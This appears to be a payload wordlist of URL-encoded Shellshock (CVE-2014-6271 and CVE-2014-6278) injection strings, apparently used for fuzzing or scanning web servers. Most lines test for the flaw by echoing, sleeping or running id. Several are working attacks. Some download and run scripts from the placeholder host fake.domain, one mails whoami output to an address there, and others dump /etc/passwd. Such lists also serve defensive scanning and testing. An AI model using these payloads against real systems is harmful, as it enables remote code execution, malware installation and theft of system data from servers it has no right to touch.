(%00)%20{%20:;%20};%20echo%20'CVE-2014-6271%20vulnerable'
()%20{%20:;%20};%20/bin/eject
()%20{%20:;%20};%20echo%20'CVE-2014-6271%20vulnerable'
()%20{%20:;};%20/bin/bash%20-c%20"/usr/bin/env%20curl%20-s%20http://fake.domain/cl.py%20>%20/tmp/clamd_update;%20chmod%20%2Bx%20/tmp/clamd_update;%20/tmp/clamd_update%20>%20/dev/null%26%20sleep%205;%20rm%20-rf%20/tmp/clamd_update"
()%20{%20:;};%20/bin/bash%20-c%20"whoami%20|%20mail%20-s%20'example.com%20l'%20test.tester@fake.domain"
()%20{%20:;};%20/bin/bash%20-c%20'cd%20/tmp;wget%20http://fake.domain/ji;curl%20-O%20/tmp/ji%20http://fake.domain/ji%20;%20perl%20/tmp/ji;rm%20-rf%20/tmp/ji'
()%20{%20:;};%20/bin/sleep%2020|/sbin/sleep%2020|/usr/bin/sleep%2020
()%20{%20:;};%20echo%20"NS:"%20$(</etc/passwd)
()%20{%20:;};%20echo%20$(</etc/passwd)
()%20{%20_;%20}%20>_[$($())]%20{%20echo%20CVE-2014-6278%20vulnerable;%20id;%20}
()%20{%20_;}>_[$($())]%20{%20echo%20x;}
()%20{%200%20<<a%20<<b%20<<c%20<<d%20<<e%20<<f%20<<g%20<<h%20<<i%20<<j%20<<k%20<<l%20<<m;%20}%20bash%20-c%20id
()%20{%200;%20};%20echo%20vulnerable;%20bash%20-c
()%20{%20foo()%20{%20foo;%20};%20>bar;%20}
()%20{%20function%20a%20a>\%20bash%20-c%20echo
()%20{%20ignored;%20};%20echo%20Content-Type:%20text/html;%20echo%20;%20/bin/cat%20/etc/passwd%20
()%20{%20ignored;%20};;%20echo%20"NS:"%20$(</etc/passwd)
()%20{%20test;};%20echo;%20echo;%20/bin/cat%20/etc/passwd
()%20{%20test;};echo%20"Content-type:%20text/plain";%20echo;%20echo;%20/bin/cat%20/etc/passwd
()%20{%20x()%20{%20_;%20};%20x()%20{%20_;%20}%20<<a;%20}%20bash%20-c
()%20{:;};%20/bin/cat%20/etc/passwd
()%20{:;};%20/usr/bin/wget%20http://fake.domain/ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA%3D%3D%20>>%20/dev/null
()%20{:;};%20ping%20-c%201%20-p%20cb18cb3f7bca4441a595fcc1e240deb0%20fake.domain
().{.:;.};.wget%20/tmp/foo%20http://fake.domain%20chmod.777%20/tmp/foo;%20/tmp/foo;
